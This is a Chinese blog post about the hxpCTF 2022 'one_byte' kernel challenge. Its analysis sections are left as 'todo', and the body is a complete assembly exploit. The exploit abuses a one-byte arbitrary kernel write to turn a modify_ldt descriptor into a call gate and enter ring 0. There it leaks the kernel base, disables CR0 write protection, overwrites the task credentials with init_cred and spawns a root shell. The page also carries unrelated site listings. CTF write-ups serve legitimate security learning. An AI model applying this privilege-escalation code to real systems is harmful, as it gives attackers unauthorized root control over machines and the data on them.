【一字节任意地址写构造调用门提权】hxpCTF2022-one_byte

已于 2024-01-17 18:01:01 修改
阅读量433 收藏 7
点赞数 10
分类专栏: # kernel-pwn 文章标签: kernel pwn 调用门提权
于 2023-12-25 10:37:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/135193717
版权

前言

通过这题复习了很多知识,包括描述符,调用门特权级转移,长调用,MSR寄存器,gs、cs段选择子,eflags/rflags等,所以总体来说收获很大。

但笔者只记录关键点,很多基础知识需要自己去查阅学习。

参考:hxp | hxp CTF 2022: one_byte writeup

题目分析

todo

利用思路

todo

exp 如下:

// gcc -no-pie -nostdlib -Wl,--build-id=none -s exp.S -o exp
#include <sys/syscall.h>

.macro var name:req
        .pushsection .data
        .balign 8
        .local \name
        \name:
.endm

.macro endvar name:req
        .local end_\name
        end_\name:
        .eqv sizeof_\name, end_\name - \name
        .popsection
.endm

.macro asciz name:req, data:vararg
        var \name
                .asciz \data
        endvar \name
.endm

.macro far_ptr name:req, sel:req, off:req
        var \name
                .int \off
                .short \sel
        endvar \name
.endm

.macro exec_syscall sys_num:req
        movq \sys_num, %rax
        syscall
.endm

.macro fn name:req
        .text
        .code64
        .global \name
        \name:
.endm

#define ENTRY_SYSCALL_OFFSET 0xa00010
#define LDT_BASE 0xffff880000000000
#define LDT_OFFSET 0x10000
#define CURRENT_OFFSET 0x1fbc0
#define INIT_TASK_OFFSET 0x1613940
#define INIT_CRED_OFFSET 0x1654480
#define REAL_CRED_OFFSET 0xa78
#define CRED_OFFSET 0xa80
#define EXEC_LPE_CODE_OFFSET 0xb00000
#define MSG_LSTAR 0xC0000082
#define ENTRY_NUMBER 2
#define TARGET_SEL ((ENTRY_NUMBER << 3) | 0b111)

fn call_gate_handler

        cli

        // leak kbase
        xorq %rax, %rax
        xorq %rdx, %rdx
        movq $MSG_LSTAR, %rcx
        rdmsr
        shlq $0x20, %rdx
        orq %rax, %rdx
        sub $ENTRY_SYSCALL_OFFSET, %rdx
        movq %rdx, %r15

        // disable CR0.WP
        movq %cr0, %rax
        andq $0xfffffffffffeffff, %rax
        movq %rax, %cr0

        // copy the LPE_CODE to kernel text space
        movq %r15, %rdi
        addq $EXEC_LPE_CODE_OFFSET, %rdi
        movq %rdi, %r14
        leaq LPE_CODE(%rip), %rsi
        movq $sizeof_LPE_CODE, %rcx
        rep movsb

        jmp *%r14


var LPE_CODE
        swapgs

        // switch PAGE TABLE
        movq %cr3, %rax
        subq $0x1000, %rax
        movq %rax, %cr3

        // get init_cred
        movq %r15, %rdx
        addq $INIT_CRED_OFFSET, %rdx
        addl $2, (%rdx)

        // switch current.cred and current.real_cred
        movq %gs:CURRENT_OFFSET, %rax
        movq %rdx, REAL_CRED_OFFSET(%rax)
        movq %rdx, CRED_OFFSET(%rax)

        // switch PAGE TABLE
        movq %cr3, %rax
        addq $0x1000, %rax
        movq %rax, %cr3

        // swapgs
        // iretq
        // rip
        // cs
        // flags
        // rsp
        // ss
        popq %r8
        popq %r9
        pushfq
        orq $(1 << 9), (%rsp)
        pushq %r9
        pushq %r8
        swapgs
        iretq

endvar LPE_CODE

asciz dev_file, "/dev/one_byte"
asciz shell_path, "/bin/sh"

var shell_argv
        .quad shell_path
        .quad 0
endvar shell_argv

var user_desc
        .int ENTRY_NUMBER
        .int 0x10       // base  ==> KERNEL_CS = 0x10
        .int 0x1000     // limit ==> offset = 0x401000 --> 0x1000 -|
        .int 0x1        // flags ==> offset = 0x401000 --> 0x40   -|
endvar user_desc

var temp_desc
        .int ENTRY_NUMBER + 2
        .int 0x10
        .int 0x1000
        .int 0x1
endvar temp_desc

var arb_write_msg
        .quad LDT_BASE + LDT_OFFSET + (ENTRY_NUMBER << 3) + 5
        .byte 0b11101100
endvar arb_write_msg

.macro modify_ldt desc:req
        movq $0x11, %rdi
        leaq \desc(%rip), %rsi
        movq $sizeof_\desc, %rdx
        exec_syscall $SYS_modify_ldt
.endm

fn _start
        // open dev file
        xorq %rdx, %rdx
        movq $1, %rsi
        leaq dev_file(%rip), %rdi
        exec_syscall $SYS_open
        movq %rax, %r15

        // stac
        pushfq
        orq $(1 << 18), (%rsp)
        popfq

        // create ldt
        modify_ldt user_desc
        modify_ldt temp_desc

        // write type to construct call gate
        movq %r15, %rdi
        leaq arb_write_msg(%rip), %rsi
        movq $sizeof_arb_write_msg, %rdx
        exec_syscall $SYS_write

        // trigger call gate to switch CPL
        far_ptr call_gate, TARGET_SEL, 0xDEADBEEF
        lcall *(call_gate)

        // get root shell
        leaq shell_path(%rip), %rdi
        leaq shell_argv(%rip), %rsi
        xorq %rdx, %rdx
        exec_syscall $SYS_execve

效果如下:

XiaozaYa
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hxp 36C3 CTF Web题 WriteupBin Writeup (Selenium模拟点击+Content Security Policy+Nonce+Parsley.js触发错误提示)
keyball123的博客
02-26 2287
WriteupBin – A web challenge from hxp 36C3 CTF https://ctftime.org/event/825 题目部署 本地搭建: 解压WriteupBin.tar.xz,在Dockerfile所在目录下执行: echo 'hxp{FLAG}' > flag.txt && < /dev/urandom tr -dc a-f0-...
调用提权操作
weixin_34313182的博客
06-21 242
1。调用在gdt表中 在dgt表中注册一个回调函数 然后调用 提权与中断相同操作 nt!DbgBreakPointWithStatus+0x4: 83eb2110 cc int 3 kd> r gdtr gdtr=80b95000 kd> dq 80b95000 L30 80b95000 00000000`00000000 00cf9b00`0...
27-通过调用实现提权
网络安全
06-27 1327
参考资料:9-调用(无参) 1. 什么是调用 在之前的学习中,JMP FAR指令实现代码跨段的本质是修改CS段寄存器,并不会改变程序的特权级别(即修改CPL的值),如果我们即想要实现代码跨段和提权的话,就需要用到调用调用是CPU提供的一个功能,它允许一个3环(CPL=3)的程序通过这扇“”来修改CS段寄存器并实现提权到0环(CPL=0),实际上调用是一个系统段描述...
hxpctf2022 valentine
qq_61768489的博客
03-13 762
它是这里来防止模板注入, 题的时候走到这里就是想绕过校验,但是没有找到合适的方法。其实我们用bp抓包就可以忽略这里的重定向问题哈哈哈,可以顺利拿到重定向的uudi路径。全局肯定不行了,所以使用单个模板文件方式,可以看到,其实就是多一句。拿到题目的感觉是模板渲染嘛,并且是ejs模板。一般的payload是。
2020 hxpctf kernel-rop
weixin_46483787的博客
04-18 2824
kernel的第四天,还是挺不好学的··· 通过这道题我们来学习一下通过覆盖modprobe_path的内核漏洞利用姿势 拿到题目后先解包,分析下启动脚本 #!/bin/sh qemu-system-x86_64 \ -m 128M \ -cpu kvm64,+smep,+smap \ -kernel vmlinuz \ -initrd initramfs.cpio.gz \ -hdb flag.txt \ -snapshot \ -nographi
hxpctf-sqliteweb复现记录
hms1624的博客
04-05 265
hxpctf sqlliteweb部分复现
SHELL CTF 2022题目及wp
Laffrey的专栏
08-16 388
https://gitcode.net/rickliuxiao/shellctf2022 SHELLCTF2022 真题及wp。
2022 DSCTF首届数字空间安全攻防大赛
qq_53263789的博客
07-17 880
2022-DSCTF-web
hxp ctf 2022 crypto/yor
是我的博客
03-27 303
原题然后通过nc获取返回值flag格式hxp{DUMMY}<br>
HackPack CTF 2022 WriteUp
04-09 945
文章目录pwn-Terminal Overdriveweb-Imported Kimchi 1web-Imported Kimchi 2rev-3T PHON3 HOM3rev-Self-Hosted Cryptorev-Shopkeeper 1rev-Shopkeeper 2rev-Shopkeeper 3 pwn-Terminal Overdrive # -*- coding: utf-8 -*- from pwn import * r = remote('cha.hackpack.club',1099
Pin-in-ctf 学习分析
BadRer的博客
07-20 3279
前言 这次打qctf,做到了一个ollvm,控制流平坦化的题,虽然不是很明白原理(但这么叫感觉很6批)。听师傅们说可以用pin解决,于是先学习一下pin在ctf中的应用,为解决olvm铺路。 应用 具体的pin和pintool我就不说了 0x0 NDH2k13-crackme-500 首先看到这个文件700+k,一看就不好分析,nm提示内存分配太多?,IDA打开,提示各种错误,不多我还...
Arcmap天地图历史影像插件全国版-免费!免费!
07-22
2024版“天地图”首次开放多时相影像专题,公众可查看32个省级天地图节点近半个世纪的历史影像;本arcmap插件集成了全国天地图历史影像接口,累计上千期。 免费使用。不收费!!不收费!!不收费!!
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包
07-22
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 通过网上交易这个平台,我们足不出户就可以了解商品的信息和价格,不仅方便了用户也为用户节约了时间,系统的主要功能就是:商品类别管理、商品信息管理、订单管理、会员管理、系统公告管理等。分为管理员用户、会员用户这二种用户平台。 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程(在说明文档中)
mysql安装配置教程
07-22
MySQL的安装和配置过程可能因操作系统和版本而异,但以下是一些通用的步骤,适用于大多数情况: ### Windows系统安装MySQL: 1. **下载MySQL Installer**: - 访问[MySQL官方网站](https://dev.mysql.com/downloads/installer/)下载MySQL Installer。 2. **启动MySQL Installer**: - 运行下载的安装程序。 3. **选择安装类型**: - 选择“Developer Default”安装类型,它包括MySQL Server和常用的开发工具。 4. **配置MySQL Server**: - 在“Server Instance Configuration”中,输入root用户的密码,并配置MySQL的安装路径。 5. **详细配置**: - 根据需要配置MySQL Server的详细设置,如字符集、默认存储引擎等。 6. **安装**: - 检查配置,然后点击“Execute”开始安装。 7. **安装完成**: -
文化娱乐-微博情感分析-含实验报告-约150行(分词、朴素贝叶斯模型).rar
07-22
数据可视化实例的python实现,可供学习了解
微信小程序+外卖小程序
07-22
微信小程序是一种不需要下载安装即可使用的应用,它实现了应用“触手可及”的梦想,用户扫一扫或搜一下即可打开应用,体现了“用完即走”的理念。 特点: 无需安装和卸载:用户可以直接使用,使用完直接关闭,不会占用桌面空间。 制作成本低:小程序开发槛相对较低,难度不及APP,能够满足简单的基础应用需求。 内存小、运行快:小程序体积小,加载速度快,操作便利快捷。 容易部署,延展性强:小程序具有丰富的延展性,可以适应多种应用场景。
mysql安装配置教程.docx
最新发布
07-22
mysql安装配置教程
Qt5.12制作的库存管理系统
07-22
基于Qt512开发的商品库存管理系统,利用MySql构建库存管理数据库,设置有商品编号、名称、数量、单价、采购单位、负责人、入库时间、出库时间、备注的记录,使用ODBC数据源连接MySQL,在QT中编程序,并制作了仓库管理系统的UI界面,利用QT设计师界面构建子界面,完成新增商品、商品入库、商品出库、删除商品、搜索商品、导出数据、商品汇总的功能,实现数据库与UI数据展示等同步。
跑步运动微信小程序.zip
07-22
跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。
河道水面漂浮物视频数据集05
07-22
河道漂浮物数据集05,通过自己采集提供给大家使用,注意本数据集未标注。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值